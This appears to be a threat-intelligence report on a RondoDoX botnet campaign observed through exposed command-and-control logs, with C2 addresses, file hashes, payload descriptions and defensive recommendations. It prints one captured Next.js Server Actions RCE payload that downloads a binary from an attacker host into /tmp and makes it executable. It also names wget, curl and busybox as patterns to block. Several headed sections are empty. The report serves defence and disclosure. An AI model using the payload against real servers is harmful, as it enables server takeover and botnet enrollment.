Executive Summary

CloudSEK discovered another wave of RondoDoX botnet exploitation through exposed command and control logs spanning nine months. This log file documents a multi-month campaign of automated exploitation attempts targeting vulnerable web applications and IoT devices. The activity spans from March 2025 to December 2025, showing quick adaptation to latest trends in attacks by the threat actor group, not limiting themselves to deploying botnet payloads, web shells, and cryptominers - but also weaponizing the latest Next.js vulnerability. On 10th December, Darktrace reported about React2Shell exploitation from their honeypot telemetry, but the threat actors have switched up their infrastructure ever since. 3 days after their report, we started seeing new C2s that are active till date.

CloudSEK has been monitoring these logs for several months, with customers already alerted when their technology stacks overlapped with targeted attack vectors from this campaign.

‍

Analysis 

During our routine scans for malicious infrastructure, CloudSEK’s TRIAD found loggers in use by threat actors.

The server contained botnet command and control logs issued by threat actors over the period of the last 9months, which gave us insights about their attack vectors and infrastructure in use.

Key Findings

• Three distinct phases confirmed through log timestamps and attack patterns
• Six confirmed C2 servers with overlapping operational periods
• Rondo botnet is the primary malware family with 10+ variants
• Next.js RCE became dominant attack vector in December 2025
• 40+ repeat attacks on same vulnerability within 6 days (Dec 13-Present)

Temporal Attack Patterns (Evidence-Based)

Highest Activity Periods:

• April 3, 2025: 80+ exploitation attempts (vulnerability scanning day)
• August 2025: Daily automated attacks on IoT devices
• December 13, 2025 - Present: Peak Next.js exploitation (hourly attacks)

Attack Frequency:

• Phase 1 (March-April): Sporadic, manual testing
• Phase 2 (April-June): Daily automated scans
• Phase 3 (July-December): Hourly automated deployment

Phase 1: Initial Reconnaissance & Vulnerability Testing (March-April 2025)

March 28, 2025 - First Exploitation Attempt

April 3, 2025 - Systematic Vulnerability Scanning Begins

SQL Injection testing:

Command Injection testing:

Java Deserialization testing:

WebLogic exploitation:

Timestamp: 2025-04-03 11:49:01

‍

Phase 2: Web Application Exploitation (April-June 2025)

April 3, 2025 - Mass Vulnerability Probing

CMS/Framework Attacks:

Drupal exploitation:

Struts2 OGNL injection:

WordPress Gravity Forms Unique ID Plugin:

IoT Device Targeting:

Wavlink router:

Router diagnostic command injection:

‍

Phase 3: IoT Botnet Deployment Campaign (July-December 2025)

July 2025 - Rondo Botnet Infrastructure Emergence

July 18-20, 2025 - Linksys Router Campaign

C2: 38.59.219[.]27 serving malware named "rondo.[device-type].sh"

‍

August 2025 - Campaign Intensification

New C2: 74.194.191[.]52

NTP server poisoning:

Ping diagnostic abuse:

Hostname injection:

Evidence: At least 13 different rondo script variants deployed from this C2.

‍

November 2025 - New C2 Infrastructure

C2: 41.231.37.153 and 70.184.13.47

NTP Abuse:

Command execution via diagnostic tools:

System command submit:

‍

December 2025 to Present - Next.js Exploitation Wave

Binary download and execution:

Timestamp: 2025-12-13 08:48:07

[0] => {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/tmp/123').on('finish',()=>process.mainModule.require('fs').chmodSync('/tmp/123',0o755))));","_formData":{"get":"$1:constructor:constructor"}}}

‍

‍

Next.js Server Actions Exploitation

Wave 1: Next.js Vulnerability Scanning

• Timeframe: December 8-16, 2025
• Purpose: Identify vulnerable servers
• Method: Blind RCE testing with output exfiltration via redirects
• Commands: echo VULN, whoami, arithmetic tests

Wave 2: IoT Botnet Deployment via Node.js

• Timeframe: December 13, 2025 - Present
• Purpose: Deploy botnet clients on vulnerable servers
• Method: Download ELF binaries, chmod +x, background execution
• C2: 5.255.121.141, 51.81.104.115
• Payloads: 
  
  • /nuts/poop - Coinminer
  • /nuts/bolts - this payload is a Linux-focused botnet support framework designed to establish dominance, persistence, and long-term stability on compromised hosts. The first variant operates as a loader and health-checker for RondoBOT, terminating competing malware and coin miners before downloading the primary bot binary and configuration directly from its C2 infrastructure. The second variant complements this by aggressively purging known botnets, Docker-based payloads, residual artifacts from prior campaigns, and associated cron jobs, while also enforcing persistence through /etc/crontab. It continuously scans /proc to enumerate running executables and kills non-whitelisted processes every ~45 seconds, effectively preventing reinfection by rival actors.
  • /nuts/x86 - Mirai

Impact

• Widespread IoT Device Compromise: Organizations with internet-facing routers (DLink, TP-Link, Netgear, Linksys, ASUS), IP cameras, and network appliances face automated hourly exploitation attempts, leading to potential botnet enrollment, DDoS participation, and cryptomining operations on corporate infrastructure.
• Next.js Application Risk: Enterprises running Next.js Server Actions (especially versions vulnerable to prototype pollution attacks) face critical RCE exposure with active exploitation observed recently. The vulnerability allows complete server compromise through deserialization flaws in Server Actions.
• Credential Harvesting and Lateral Movement: The multi-attack chain begins with web application exploitation (WordPress, Drupal, Struts2, WebLogic) to establish initial access, followed by credential theft and pivoting to targeting IoT infrastructure, potentially compromising entire network segments.
• Persistent Multi-Architecture Threats: The botnet deploys binaries for x86, x86_64, MIPS, ARM, and PowerPC architectures with multiple fallback mechanisms (wget, curl, tftp, ftp), ensuring payload delivery across diverse enterprise environments including cloud instances, edge devices, and embedded systems.

‍

Recommendations

• Immediate Next.js Application Audit: Conduct emergency security reviews of all Next.js applications using Server Actions. Implement input validation on all serialized data, upgrade to patched versions immediately, and consider disabling Server Actions on internet-facing applications until vendor patches are validated and deployed.
• IoT Device Segmentation and Hardening: Isolate all IoT devices (routers, cameras, NAS, printers) into dedicated VLANs with strict egress filtering. Disable remote management interfaces, change default credentials immediately, apply firmware updates, and implement allowlist-based firewall rules blocking outbound connections except to trusted update servers.
• Web Application Security Controls: Deploy Web Application Firewalls (WAF) with rules blocking command injection patterns (wget, curl, busybox, pipe operators in HTTP parameters), implement strict input validation on all diagnostic/administrative interfaces, and disable unnecessary command execution features in web panels.
• Network-Level Detection and Blocking: Block identified C2 infrastructure (38.59.219.27, 74.194.191.52, 41.231.37.153, 70.184.13.47, 5.255.121.141, 51.81.104.115) at perimeter firewalls and DNS resolvers. Deploy network intrusion detection signatures for "rondo.*.sh" URI patterns and "nuts/poop" endpoint requests.
• Behavioral Monitoring for Persistence Indicators: Monitor for suspicious process execution in /tmp, /dev/shm, /dev directories; detect chmod operations setting 755/777 permissions; alert on background process spawning via & operator; and track outbound HTTP/HTTPS connections from non-browser processes to unknown IPs.
• Zero Trust Architecture for Admin Interfaces: Require VPN or jump host access for all device management interfaces, implement multi-factor authentication on admin panels, use certificate-based authentication where possible, and log all administrative actions to SIEM with real-time alerting on command execution attempts.
• Continuous Vulnerability Management: Establish patch management SLAs requiring critical vulnerabilities in internet-facing applications be patched within 72 hours. Subscribe to threat intelligence feeds for early warning of exploitation attempts, conduct quarterly penetration testing focused on IoT and web application attack surfaces, and maintain asset inventory of all devices with firmware versions tracked.

‍

Appendix

IOCs

Confirmed C2 Servers with Timeline:

‍

Binary payloads(sha256):

• /nuts/poop - 895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b (Coinminer)
• /nuts/bolts - 8e0bc23a87d349e5a5356252ce17576093b7858fdf6ea84919fbdcb2e117168e (healthcheck)

50be5257678412f0810d46e0b0bc573eb65c6ce4617346c1527ff0dc9b7fc79e (persistence)

• /nuts/x86 - 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (Mirai)

Pivoting 

The threat actor added an NSFW image on one of their C2s as a deterrent for anyone visiting the site. 

Using the hash value of that image, we found some more C2s that were in use by these threat actors.

C2 found using pivot

5.231.70.66

‍

References

• *Intelligence source and information reliability - Wikipedia
• ^#Traffic Light Protocol - Wikipedia

the